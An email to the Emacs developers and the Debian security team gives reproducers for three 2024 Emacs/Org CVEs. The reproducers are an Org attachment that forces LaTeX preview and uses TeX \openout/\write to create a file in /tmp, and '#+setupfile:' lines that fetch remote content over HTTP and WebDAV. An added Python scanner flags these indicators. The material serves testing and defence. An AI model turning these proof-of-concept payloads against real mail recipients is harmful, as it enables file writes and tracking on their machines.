From: Max Nikulin <manikulin@gmail.com>
To: Sean Whitton <spwhitton@spwhitton.name>,
	Ihor Radchenko <yantar92@posteo.net>
Cc: emacs-devel@gnu.org, team@security.debian.org
Subject: Re: Reproducers for recent Emacs security issues
Date: Sun, 14 Apr 2024 11:41:31 +0700
Message-ID: <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com>
In-Reply-To: <875xwk8w5w.fsf@melete.silentflame.com>

On 14/04/2024 10:23, Sean Whitton wrote:
> 
> I already have a sample Org file that I can use to test whether
> CVE-2024-30202 is fixed.  Would you happen to already have reproducers
> for the other two problems to hand?

LaTeX preview issue
===================

- CVE-2024-30203 In Emacs before 29.3, Gnus treats inline MIME contents as trusted.
- CVE-2024-30204 In Emacs before 29.3, LaTeX preview is enabled by default for e-mail attachments.

It requires fixes in Emacs code besides Org mode.

1. Install dvipng.
Alternatively you may install dvisvgm and add to your init file
     (setq org-preview-latex-default-process 'dvisvgm)

2. Send a mail message with an attachment having
     Content-Type: text/x-org
or
     Content-Type: text/org
depending on MUA configuration. By default you may get
application/vnd.lotus-organizer for .org files due to /etc/mime.types.

Attachment content:

---- 8< ----
#+startup: latexpreview
LaTeX:
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
\closeout\testfile
A \to \textrm{/tmp/\jobname.poc}
\end{equation}

*Warning!* Change the math snippet before every test
or remove the cached image.
---- >8 ----

3. Open message.

LaTeX preview never worked in attachment inline preview.
Check that a file is created in /tmp/:
     ls -l /tmp/orgtex*.poc

The issue is not fixed for the scenario when an arbitrary text file is
opened in Emacs directly (e.g. a file downloaded from some web site).

Attempts to download remote content
===================================

CVE-2024-30205 In Emacs before 29.3, Org mode considers contents of
remote files to be trusted. This affects Org Mode before 9.6.23.

Actually there are 2 issues. They may be used to track that users
receive messages, so mail addresses are valid. In addition they allow
downloading from a remote site a payload for the LaTeX preview or code
execution exploits.

[BUG] Unsolicited download of remote resources.
Fri, 2 Feb 2024 23:57:54 +0700.
https://list.orgmode.org/upj6uk$b7o$1@ciao.gmane.io

--- 8< ---
#+setupfile: http://localhost:8000/setup-1234567890.org
--- >8 ---

[BUG] Org may fetch remote content without asking user consent.
Wed, 7 Feb 2024 17:54:07 +0700.
https://list.orgmode.org/upvngj$150v$1@ciao.gmane.io

Requires the gvfs-backends package to be installed.
--- 8< ---
#+setupfile: /dav:localhost#8000:/msg-123456.org
--- >8 ---

Notice that the following commit is not mentioned in the CVE description.
https://git.savannah.gnu.org/cgit/emacs.git/commit/?id=e56f0ef51bf
2024-02-02 20:59:41 +0100 Ihor Radchenko: org: Fix security prompt for 
downloading remote resource

Backporting fixes to Emacs-28 requires more changes since the dialog to
ask the user if a file should be downloaded has been implemented in Org-9.6
while Emacs-28 is shipped with Org-9.5.

Trying to reproduce, you may face the following issue:
[BUG] Partially broken Org mode when remote setupfile is unavailable.
Tue, 19 Mar 2024 17:46:46 +0700.
https://list.orgmode.org/utbqeo$bk3$1@ciao.gmane.io
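
As an added example (not part of Max Nikulin's message, nor code from Emacs or Org mode), a small Python scanner that flags the indicators described above in an Org attachment before it is opened in Emacs: remote #+setupfile/#+include targets (URL or TRAMP-style path), a buffer-local latexpreview startup option, and TeX file-I/O primitives inside math snippets. The heuristics and the SAMPLE text are constructed for illustration.

```python
"""Flag Org-mode content that can trigger remote fetches or TeX file I/O."""
import re

# Keywords that make Org read another file while setting up the buffer.
REMOTE_KEYWORD = re.compile(
    r"^\s*#\+(?:setupfile|include):\s*(?P<target>\S+)", re.I | re.M)
# URL schemes (http://, https://, ...) and TRAMP method prefixes (/dav:, /ssh:).
REMOTE_TARGET = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|/[a-z0-9-]+:)", re.I)
# Startup option that turns LaTeX preview on regardless of user settings.
LATEX_STARTUP = re.compile(r"^\s*#\+startup:.*\blatexpreview\b", re.I | re.M)
# TeX primitives that touch the file system when the snippet is compiled.
TEX_FILE_IO = re.compile(r"\\(openout|openin|write|read|input|include)\b")


def scan_org(text):
    """Return a list of (kind, detail) findings for the given Org text."""
    findings = []
    for m in REMOTE_KEYWORD.finditer(text):
        target = m.group("target")
        if REMOTE_TARGET.match(target):
            findings.append(("remote-resource", target))
    if LATEX_STARTUP.search(text):
        findings.append(("latex-preview-forced", "#+startup: latexpreview"))
    # Report each primitive once, in a stable order.
    for name in sorted({m.group(1) for m in TEX_FILE_IO.finditer(text)}):
        findings.append(("tex-file-io", "\\" + name))
    return findings


# Constructed sample mirroring the indicators quoted in the message above.
SAMPLE = r"""#+setupfile: http://localhost:8000/setup-1234567890.org
#+setupfile: /dav:localhost#8000:/msg-123456.org
#+setupfile: ./local-setup.org
#+startup: latexpreview
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
\closeout\testfile
\end{equation}
"""

if __name__ == "__main__":
    for kind, detail in scan_org(SAMPLE):
        print(kind, detail)
```

The local ./local-setup.org target is deliberately not reported, since only targets Org would fetch over the network (or via TRAMP) matter here.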
